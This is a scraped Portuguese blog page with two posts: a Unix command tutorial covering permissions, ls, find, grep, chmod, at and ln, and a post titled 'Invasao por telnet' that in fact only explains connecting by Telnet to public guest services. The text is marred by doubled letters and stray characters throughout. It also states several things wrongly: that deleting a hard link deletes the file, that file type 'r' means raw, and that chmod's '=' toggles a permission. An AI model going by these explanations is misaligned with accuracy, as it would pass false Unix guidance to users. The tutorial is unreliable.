Unix é um sistema operacional desenvolvido em 1969, pela Bell Laboratories, originalmente para executar em<br />computadores da DEC, sendo que mais tarde passou a; ser utilizado em mainframes . Num sentido menos amplo o UNIX<br />é um sistema operacional de tempo compartilhado, denominado kernel.O kernel é um programa que controla os<br />recursos do computador e os aloca entre os usuários. Ele controla os programas e periféricos (disco, terminais,<br />impressoras, etc.) que estão ligados à máquina. O UNIX possui algumas características como:<br />Capacidade de multitarefa<br />Mutiusuários<br />Portabilidade<br />Conectividade e comunicações<br />Para usuários de DOS<br /><br />Para quem está acostumado com o DOS, notará algumas diferenças, como os nomes de arquivos, que no DOS tem<br />apenas 8 de nome e 3 de extenção, no UNIX não tem limite podendo ter várias extenções. Ex: relatorio.txt.zip.tar. Outro<br />detalhe é por ser um sistema mutiusuário, a entrada ao sistema é feita com um login e um password, onde login é o<br />nome do usuário e password é uma senha de segurança.<br />Permissões de arquivos e diretórios<br /><br />No Unix existe uma sequência de caracteres que definem o que cada usuário pode fazer com cada arquivo ou diretório<br />e somente o dono do arquivo (owner) e o gerente da rede (root) pode mudar as permissões atraves< do comando<br />chmod. Essa sequência é:<br />d rwx rwx rwx<br /><br />| | | | Onde:<br /><br />tipo dono grupo outros r=leitura<br /><br />w=escrita (gravação)<br /><br />x=execução<br />Tipo - é o tipo do arquivo e pode ser:<br />d = diretório<br />b = block<br />r = raw<br />l = simbolic link<br />Dono - dono do arquivo, o dono é quem o criou ou copiou.<br />Grupo - grupo de usuários a que o dono pertence (exemplo: grupo alunos ou grupo professores)<br />Outros - demais usuários, o resto das pessoas que tem o acesso ao arquivo<br />Detalhes<br /><br />O Unix é sensível a caixa das letras, isto é, se um comando é em letra minúscula não pode ser digitado em maiúscula<br />ou se um parâmetro do comando for em maiúscula tem que ser digitado em maiúscula<br />Existem arquivos e diretórios escondidos. Para esconder basta colocar um . no começo do nome (.plan)<br />Pode-se executar vários comandos na mesma linha utilizando o caracter ;<br /><br />Comando ls<br />Esse comando mostra o conteúdo de um diretório. É equivalente ao comando dir do DOS.<br />O comando list mostra os arquivos existentes ordenados em ordem alfabética. O ls como outros comandos tem opções<br />para apresentar outras informações.<br />Sintaxe<br />ls [-latRF] [arquivo]<br />Parametros<br />-t = lista os arquivos em ordem de criaação<br />-a = lista todos os arquivos, inclusivee os escondidos<br />-F = acrescenta os seguintes caracteress no final dos arquivos:<br />/ - diretório<br />@ - link<br />* - executável<br />-R = lista todos os arquivos e subdirettórios<br />-l = lista de uma forma completa <<br /><br />Comando cat<br />O comando cat mostra o conteúdo de arquivos, geralmente do tipo texto. Funciona bem com arquivos pequenos, mas<br />se o arquivo for grande o texto rolará e o usurário não conseguirá ler o conteúdo do arquivo.<br />Serve também para criação de arquivos texto pequenos do tipo lembretes, para isso basta direciona-lo com > para o<br />nome do arquivo a ser criado (segue exemplo).<br />Sintaxe<br />cat arquivo [arquivo2] [aquivo3]<br /><br />Comando more<br />O comando more assim como o cat serve para ver o conteúdo de um arquivo que é, geralmente, texto. A diferença<br />entre o more e o cat é que o more faz uma pausa a cada tela cheia exibindo uma mensagem "--More--", dando uma<br />oportunidade ao usuário ler a tela. Existem vários comandos que são listados ao apertar h mas os mais usados são:<br />enter exibe mais uma linha do texto<br />espaço exibe mais uma pagina do texto<br />ctrl+l rescreve a tela<br />v chama o editor de textos vi do Unix para a linha corrente<br />Sintaxe<br />more arquivo<br />Parametros<br />Esse comando não possui parâmetros<br /><br />Comando cal<br />Este comando é usado para exibir o calendário de um determinado mês ou ano.<br />Observação<br />o mês deve ser completo, pois o cal difere 95 de 1995. Caso somente um número seja informado será exibido o<br />calendário daquele ano, se nenhum numero for fornecido será exibido o calendário do mês corrente, anterior e<br />posterior.<br />Sintaxe<br />cal [-r] [mês] [ano]<br /><br />Comando mkdir<br />Serve para criar diretórios e subdiretórios especificados.<br />Sintaxe<br />mkdir diretório<br />Parâmetros<br />Esse comando não possui parâmetros.<br /><br />Comando rmdir<br />Serve para remover diretórios e subdiretórios especificados.<br />Sintaxe<br />rmdir diretório<br />Parametros<br />Esse comando não possui parâmetros.<br /><br />Comando cp<br />Esse comando é útil para copiar arquivos e diretórios para outros diretórios. Semelhante ao comando copy do DOS.<br />Sintaxe<br />cp [-r] nome1 nome2<br />Parametros<br />-r = copia o conteúdo dos subdiretórioss caso nome1 for um diretório<br /><br />Comando mv<br />Esse comando é útil para mover arquivos e diretórios. Também é usado para renomear tanto arquivos quanto<br />diretórios, pois o Unix não possui um comando especifico para trocar os nomes de arquivos. Muito cuidado ao mover<br />ou renomear um arquivo, verifique se não exista um outro com o mesmo nome, senão o arquivo existente irá ser<br />substituído pelo outro.<br />Sintaxe<br />mv [-i] nome1 nome2<br />Parametros<br />-i = pergunta confirmação ao mover p;<br /><br />Comando rm<br />Esse comando é útil para remover arquivos e diretórios. Mas cuidado ao usar o comando rm, pois o Unix não consegue<br />recuperar arquivos, se por acaso usar o parâmetro -r em um diretório. Semelhante aos comandos del e deltree do<br />DOS.<br />Sintaxe<br />rm [-ir] nome1<br />Parametros<br />-r = remove o conteúdo dos subdiretórioos caso nome1 for um diretório<br />-i = pergunta confirmação para os arquiivos<br /><br />Comando find<br />Procura por um determinado arquivo no winchester apartir do diretório especificado dando uma lista de quais<br />diretórios se encontra o arquivo especificado.<br />Sintaxe<br />find diretório [-parâmetros]<br />Parametros<br />-name arquivo = indica o arquivo a ser procurado<br />-user usuário = indica que o arquivo teem que pertencer a o usuário indicado<br />-group grupo = indica que o arquivo temm que pertencer a o grupo indicado<br />-mtime n = procura os arquivos que foraam modificados nos exatos n dias<br />-print = imprime o nome do arquivo na ttela, é sempre necessário pois sem ele não irá ser mostrado nada<br />-exec comando {} \; = executa o comandoo para todos os arquivos encontrados o {} \; faz parte da sintaxe e é<br />substituído pelo nome do arquivo e é necessário o espaço entre as chaves e a barra<br /><br />Comando grep<br />Procura pela ocorrência de uma string no arquivo especificado. Ele exibe apenas as linhas que possuem a string mas<br />cuidado com os caracters interpretados pelo shell (, ), {, }, ;, ?, !, *, [, e ] use um apóstrofo para isolar esses caracteres.<br />Sintaxe<br />grep [-parâmetros] expressão arquivo<br />Parametros<br />-v = mostra as linhas que não aparece aa string<br />-i = ignora a diferença entre letras maaiúsculas e minúsculas<br />-c = mostra o número de vezes que foi eencontrada a expressão<br />-n coloca o número da linha em que foi encontrada a expressão<br /><br />Comando chmod<br />Muda a permição dos arquivos e diretórios. As permissões de arquivos estão detalhadas no tópico Permissões de<br />Arquivos ao lado esquerdo da página.<br />Sintaxe<br />chmod [-fR] quem+/-permissão arquivo<br />Parametros<br />-R = troca para arquivos que estão em ssubdiretórios<br />-f = caso ocorra algum erro ele força aa troca de permissão<br />quem = é a classe do usúario (ugoa) para quem vai receber a permissão nova<br />u = usuário<br />g = grupo<br />o = outros<br />a = todas as classes juntos (all)<br />+/-/= = mais, menos ou igual define se você vai colocar (+) ou tirar (-) a permissão, o sinal = serve para trocar a<br />permissão se ele tiver com permissao ele tira a permissão<br />permissão = tipo de permissão (rwx)<br />r = leitura<br />w = escrita<br />x = execução<br /><br />Comando cd<br />Muda de diretório, equivale ao mesmo comando do DOS. Como o Unix não mostra o diretórios corrente no prompt<br />como o DOS pode-se usar o comando pwd para mostrar o diretórios corrente. Nã esqueça que o diretório principal é<br />simbolizado por / (diferente a do DOS).<br />Sintaxe<br />cd [diretório]<br />Parametros<br />diretório = o diretório ou o caminho de um para qual você quer ir<br /><br />Comando pwd<br />Mostra o diretório corrente em que você está. O Unix não mostra o diretórios corrente no prompt como o DOS<br />Sintaxe<br />pwd<br />Parametros<br />Esse comando não possui parametros<br /><br />Comando at<br />Processa um comando ou arquivo script para ser processados posteriormente numa hora, dia ou mês desejado. O at ,<br />após a sua sintaxe, deixa espaço para colorar os comandos ou arquivos script que serão processados posteriormente<br />(use ^d quando acabar de digitar os comandos) ou pode-se especificar um arquivo para entrada com < para dar<br />entrada um arquivo ja criado.<br />Sintaxe<br />at [-lr] hora [data] [+incremento]<br />Parametros<br />-l= lista todos os jobs programados comm at e o número designado para cada um. Mostra aqueles que voce mesmo<br />programou.<br />-r= remove um job at que você colocou. Mas antes é preciso saber o número e fila em que está o job mostrado com a<br />opção -l<br />hora= uma hora qualquer, melhor no padrão 24hs. Além o at também reconhece as horas now (agora), midnight<br />(meia-noite), noon (meio-dia).<br />data= você pode especificar uma data também. A data é no formato mes dia(,ano) ou dia da semanda (sun, mon, wen,<br />.... Pode preceder a data next (próximo).<br />+incremento= quanto tempo depois da data o at irá ser executado. é formado do símbolo + um número e uma unidade<br />de tempo (minutes (minutos), hours (horas), days (dias), months (meses) e years (anos)<br /><br />Comando in<br />O comando ln faz um atalho (link) de um arquivo ou diretório. Voce pode se referir a um arquivo que está num diretório<br />/bin por exemplo no seu diretório home somente fazendo um link do mesmo. Existe dois tipos de link o hard link e o<br />simbolic link (simbolico), o primeiro tipo faz um link onde irá apontar para o lugar no winchester onde o arquivo esta<br />amarzenado, o segundo tipo é um link simbólico pois o link é um arquivo texto que contem o path de onde o arquivo<br />está. Isto quer dizer se voce apagar um hard link ira excluir o arquivo e se apagar um simbolic link irá apagar somente<br />o link.<br />Sintaxe<br />ln [-sf] arquivo nomelink<br />Parametros<br />-s = cria um simbolic link (hrad link éé criado sem esse parametro)<br />-f = força a criação do link, para linkks que não se tem permição de leitura<br />arquivo = nome do arquivo ou diretório que vai ser linkado<br />nomelink = nome do link pode ser qualquer um, mas o interssante e colocar o mesmo nome do arquivo ou diretório.</span>John Lennon http://www.blogger.com/profile/14308640151854725076noreply@blogger.com0tag:blogger.com,1999:blog-8465546782083392981.post-55897746544553831252010-08-03T12:14:00.002-07:002010-08-03T12:16:04.404-07:00Invasao por telnet<span style="font-weight:bold;"> (Protocolo de Terminal Virtual) é o protocolo Internet para estabelecer a conexão entre computadores. Através dessa conexão remota, pode-se excutar programas e comandos em outra máquina, como se o teclado de seu computador estivesse ligado diretamente a ela.<br />O visual de uma conexão via Telnet é semelhante ao que se tem em BBS's de interface Dos, e a operação do computador remoto se dá da mesma forma, ou seja, através de uma linha de comandos Unix ou a partir de um menu de comandos disponíveis que sempre se apresenta em algum lugar da tela (esta última forma é a mais comun em servidores que permitem acesso público).<br /><br />O Telnet pode ser usado para a pesquisa de informações e transferência de arquivos - tudo depende do que o computador ao qual você está conectado permitir que você faça. Ele também é muito usado por operadores de sistemas (Sysop's) a fim de fazer algum tipo de manutenção (se você pensa que o Sysop de seu provedor sai de casa toda vez que tem algum problema nos servidores, está muito enganado; muitas vezes ele faz a manutenção de casa mesmo, via Telnet !)<br /><br />Programas para Telnet:<br />Para fazer uma conexão via Telnet, é necessário um programa específico. O windows 95 já vem com um (procure no diretório c:\windows o programa Telnet.exe - deve estar lá !).<br /><br />Conectando-se via Telnet:<br />Os passos que apresentamos aqui são para o programa que acompanha o windows 95, mas servem perfeitamente para outros programas, com algumas variações, que você pode perceber e contornar. Se você tem algum dos programas listados ao lado, leia isto primeiro e depois passe para a página específica desse programa.<br /><br />Inicie o programa Telnet.exe ou outro utilitário para esse fim. Clique no menu "Conecta" (connect), selecione "Sistema Remoto" (remote system) e digite na caixa "Nome do Host" (Host Name) o endereço ao qual você quer se conectar (ex.: spacelink.msfc.nasa.gov).<br /><br />Nas caixas "Porta" (port) e "Tipo do Terminal" (terminal type) selecione "telnet" e "vt100", respectivamente (isso não é um padrão, mas é usual; pode ser que em alguns lugares você tenha que mudar essa configuração). Feito isto, clique no botão "Conectar" (Connect). Isto iniciará a conexão com o computador remoto.<br /><br />Frequentemente, ao se completar a conexão, o sistema remoto pede uma senha. No nosso exemplo, digite "guest" e aperte enter (lembre-se, você está operando um sistema de interface parecida com o DOS - na verdade é Unix - esqueça o mouse e use o teclado !). Isto abrirá as portas do computador remoto para você.<br /><br />Na tela surge uma série de opções, precedidas de um número ou letra. Para executar um desses comandos, digite esse número ou letra e aperte enter (os usuários da época pré-windows não terão a menor dificuldade com isso).<br /><br />Explore o sistema ao qual você se conectou para exercitar. Quando quiser terminar a conexão, volte ao menu "Conecta" e selecione "Desconectar".<br /><br />Abaixo temos alguns endereços onde você pode fazer uma conexão via Telnet<br /><br />netfind.if.usp.br<br />Busca mundial de usuários na Internet.<br />Digite netfind ao estabelecer a conexão.<br />ned.ipac.caltech.edu<br />Banco de dados Extragalático da<br />NASA/IPAC. Digite ned na conexão.<br />spacelink.msfc.nasa.gov<br />Banco de dados da NASA. Digite guest ao<br />se conectar.<br />stis.nsf.gov<br />Informações científicas e tecnológicas.<br />Digite public na conexão.<br />Espero que, com estas informações, você já seja capaz de fazer uma conexão deste tipo. Alguns endereços não vão ter nada de interessante, mas não se desanime. Você pode encontrar muito material de pesquisa via Telnet.<br /><br />Exercício:<br />Conecte-se ao Banco de Dados da NASA e copie para seu computador uma foto tirada pelo telescópio Hubble (acredite, vai dar um pouco de trabalho encontrar, mas não desanime; ao final você já vai estar bem mais familiarizado com o Telnet !) ;-)<br /><br />Comandos básicos de Unix:<br />A maioria dos servidores não permite acesso público via Telnet, porque essa é a principal porta de entrada de Hackers. Nestes servidores não se encontra menus que facilitam a navegação pelo site ou operações de qualquer tipo, o que leva a necessidade de se conhecer alguns comandos de Unix.<br /><br />Se você é WebMaster, muitas vezes vai ter acesso a provedores de presença, via FTP e, em alguns casos, Telnet, para efetuar algumas operações que o FTP não permite. Segue abaixo uma pequena lista de comandos que lhe serão muito úteis neste caso:<br /><br />ls -l<br />lista os arquivos de um diretório<br />ls -al<br />lista todos os arquivos de um diretório, mesmo os Hidden<br />cp x y<br />copia o arquivo do diretório x para o diretório y (o caminho de diretório deve ser colocado por inteiro)<br />mv x y<br />move o arquivo do diretório x para o diretório y (o caminho de diretório deve ser colocado por inteiro)<br />rm x<br />deleta o arquivo x<br />cd xxx<br />muda o diretório ativo para xxx<br />cd ..<br />muda o diretório ativo para o que está 'acima' do atual<br />mkdir xxx<br />cria o diretório xxx dentro do diretório atual<br />rm xxx<br />remove o diretório xxx.</span>John Lennon http://www.blogger.com/profile/14308640151854725076noreply@blogger.com0